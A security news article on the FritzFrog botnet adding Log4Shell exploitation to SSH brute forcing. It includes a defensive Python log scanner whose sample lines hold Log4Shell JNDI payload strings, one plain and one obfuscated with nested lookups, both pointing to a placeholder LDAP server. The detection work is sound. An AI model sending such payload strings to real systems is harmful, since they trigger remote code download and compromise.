Akamai researchers have detected a botnet malware that has been updated to use the Log4Shell vulnerability as an infection vector. This new method supplements the botnet’s usual remote login brute force technique. The botnet in question is known as FritzFrog and was first documented in 2020. The Log4Shell vulnerability, also tracked as CVE-2021-44228, gained widespread attention in late 2021 when a flaw was identified in the widely used Apache Log4j 2 Java library. The FritzFrog botnet operators have been exploiting the fact that system administrators tend to give lower priority to patching internal network machines than to internet-facing applications, which are the more obvious patching priorities. FritzFrog specifically looks for subnets and targets possible addresses within them. This means that even if high-profile internet-facing applications have been patched, a breach of any asset in the network by FritzFrog can still expose unpatched internal assets to exploitation.
The specific method the botnet uses to trigger the Log4Shell vulnerability involves forcing an application to log data containing a malicious payload. This payload then forces the Java application to connect to a server controlled by the attacker and download a malware binary. Researchers have described FritzFrog as a “new generation” botnet due to its use of a proprietary peer-to-peer protocol to spread across SSH servers worldwide.
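Because the trigger described above is a lookup string that lands in a log entry, one defensive check is to scan existing logs for JNDI lookup patterns, including the nested Log4j lookups (`${lower:…}`, `${::-…}`, default-value syntax) commonly used to hide the literal text. The following is an added example written for this page, not code from Akamai or the FritzFrog report; the log lines, IP addresses and the set of obfuscation forms it collapses are constructed assumptions, and it is meant as a triage aid rather than a complete detector.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample log lines (not taken from the page): a benign request,
# a plain JNDI lookup, and the same lookup hidden behind nested Log4j lookups.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}${::-n}${::-d}i:ldap://203.0.113.10/x}"',
]

# Nested lookups that evaluate to a single piece of text:
#   ${lower:J} -> j     ${upper:j} -> J
#   ${::-j}    -> j     ${env:UNSET_VAR:-j} -> j   (default-value syntax)
# Both patterns deliberately exclude braces so only innermost lookups match;
# repeated passes then peel the nesting from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation, the thing we actually care about.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def _apply_case(m: re.Match) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse case and default-value lookups, innermost first, until stable.

    max_rounds bounds the work on adversarial input with very deep nesting.
    """
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(_apply_case, text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new
    return text


def find_jndi_lookup(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a lookup, else None."""
    m = _JNDI.search(normalize_lookups(line))
    return m.group(1).lower() if m else None


def scan_logs(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line index, scheme, normalised line) for every suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi_lookup(line)
        if scheme:
            hits.append((i, scheme, normalize_lookups(line)))
    return hits


if __name__ == "__main__":
    for idx, scheme, shown in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: jndi scheme={scheme}: {shown}")
```

Run it against exported web-server, application or proxy logs rather than the embedded samples; a hit is a reason to check whether the logging host made an outbound LDAP/RMI connection around that timestamp and whether its Log4j 2 version is still vulnerable. The normaliser only covers the lookup forms listed in the comments, so treat a clean result as "nothing obvious", not as proof of absence.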
According to Akamai, FritzFrog still uses brute force techniques to infect SSH servers, but it now also attempts to identify specific SSH targets by enumerating several system logs on each of its victims. This represents a concerning evolution of the botnet’s capabilities and highlights the ongoing threat that it poses to both internet-facing and internal network machines.
The expansion of FritzFrog’s capabilities to exploit the Log4Shell vulnerability underscores the widespread impact of this critical flaw in the Apache Log4j 2 library. U.S. public- and private-sector security experts have previously warned that patching every vulnerable Log4j instance could take a decade or longer. This highlights the urgency of addressing and patching vulnerabilities such as Log4Shell to prevent them from being exploited by malicious actors.
The ongoing evolution and adaptation of botnets like FritzFrog serve as a reminder of the constantly changing and dynamic threat landscape that organizations and individuals face in the digital realm. It is essential for organizations to prioritize and maintain robust cybersecurity measures to defend against these evolving threats and protect sensitive data and systems from compromise.
Overall, the detection of botnet malware updated to exploit the Log4Shell vulnerability serves as a stark reminder of the importance of prioritizing cybersecurity and promptly addressing critical vulnerabilities to prevent them from being exploited by malicious actors. This ongoing threat underscores the need for continued vigilance and proactive measures to defend against evolving cybersecurity threats in an increasingly interconnected digital environment.